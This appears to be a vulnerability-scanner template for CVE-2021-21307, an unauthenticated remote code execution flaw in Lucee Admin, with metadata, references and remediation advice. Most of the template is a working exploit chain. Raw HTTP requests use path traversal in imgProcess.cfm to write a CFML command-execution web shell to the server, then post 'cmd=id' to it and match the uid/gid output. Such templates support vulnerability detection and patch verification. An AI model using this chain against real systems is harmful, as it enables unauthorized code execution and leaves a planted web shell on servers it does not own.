id: CVE-2021-21307 info: name: Lucee Admin - Remote Code Execution author: dhiyaneshDk severity: critical description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator. reference: - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md - https://nvd.nist.gov/vuln/detail/CVE-2021-21307 - http://ciacfug.org/blog/updating-lucee-as-part-of-a-vulnerability-alert-response - https://dev.lucee.org/t/lucee-vulnerability-alert-november-2020/7643 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-21307 cwe-id: CWE-862 epss-score: 0.97313 epss-percentile: 0.99874 cpe: cpe:2.3:a:lucee:lucee_server:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: lucee product: lucee_server tags: cve2021,cve,rce,lucee,adobe http: - raw: - | POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded imgSrc=a - | POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded imgSrc=
Command:value="#form.cmd#">
Options: value="#form.opts#">
Timeout: value="#form.timeout#" value="5">
      # HTMLCodeFormat(myVar)# 
- | POST /lucee/{{randstr}}.cfm HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded cmd=id&opts=&timeout=5 matchers-condition: and matchers: - type: word part: body words: - "uid=" - "gid=" - "groups=" condition: and - type: status status: - 200 extractors: - type: regex regex: - "(u|g)id=.*" # digest: 490a0046304402201d3958e2205541727edfc0220248d3d5bb9bcda9884e707e81a5b962adc9ea8a02203c5be8f6e614ee645c8a09df29eda44f5d8c262c4f4da023266c8c652323cb0e:922c64590222798bb761d5b6d8e72950